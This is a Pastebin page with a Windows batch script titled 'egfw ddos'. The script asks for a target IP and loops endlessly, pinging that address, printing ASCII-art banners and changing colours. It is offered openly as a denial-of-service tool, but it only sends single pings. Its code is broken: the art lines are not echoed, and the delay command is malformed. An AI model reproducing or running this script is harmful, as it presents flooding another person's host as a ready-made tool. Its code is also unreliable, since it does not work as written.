Advertisement
egfw

egfw ddos

Jan 25th, 2024 (edited)
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 2.67 KB | None | 0 0
  1. @echo off
  2. chcp 65001 >nul
  3. color 1
  4. title egfw ddos
  5.  
  6.  
  7.                                    ███████╗░██████╗░███████╗░██╗░░░░░░░██╗  ██████╗░██████╗░░█████╗░░██████╗
  8.                                    █╔════╝██╔════╝░██╔════╝░██║░░██╗░░██║  ██╔══██╗██╔══██╗██╔══██╗██╔════╝
  9.                                    █████╗░░██║░░██╗░█████╗░░░╚██╗████╗██╔╝  ██║░░██║██║░░██║██║░░██║╚█████╗░
  10.                                    █╔══╝░░██║░░╚██╗██╔══╝░░░░████╔═████║░  ██║░░██║██║░░██║██║░░██║░╚═══██╗
  11.                                    ███████╗╚██████╔╝██║░░░░░░░╚██╔╝░╚██╔╝░  ██████╔╝██████╔╝╚█████╔╝██████╔╝
  12.                                    ╚══════╝░╚═════╝░╚═╝░░░░░░░░╚═╝░░░╚═╝░░  ╚═════╝░╚═════╝░░╚════╝░╚═════╝░
  13. echo
  14. echo
  15. echo
  16. echo
  17. echo  
  18. echo
  19. echo
  20. echo.
  21. echo -----------------------------------------------------
  22. echo -----------------------------------------------------
  23.  
  24. set /p IP=Enter IP To ddos :
  25. :top
  26. PING -n 1 %IP% | FIND "TTL="
  27. IF ERRORLEVEL 1 (
  28. echo.
  29. echo
  30. echo                                                                                                                 ██████╗░██████╗░░█████╗░░██████╗
  31. ██╔══██╗██╔══██╗██╔══██╗██╔════╝
  32. ██║░░██║██║░░██║██║░░██║╚█████╗░
  33. ██║░░██║██║░░██║██║░░██║░╚═══██╗
  34. ██████╔╝██████╔╝╚█████╔╝██████╔╝
  35. ╚═════╝░╚═════╝░░╚════╝░╚═════╝░
  36. echo                                                  
  37. echo    
  38. echo
  39. echo.
  40. )
  41. set /a num=(%Random%%%9)+1
  42. color %num%
  43. ping -t 2 0 10 127.0.0.1 >nul
  44. GoTo top
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement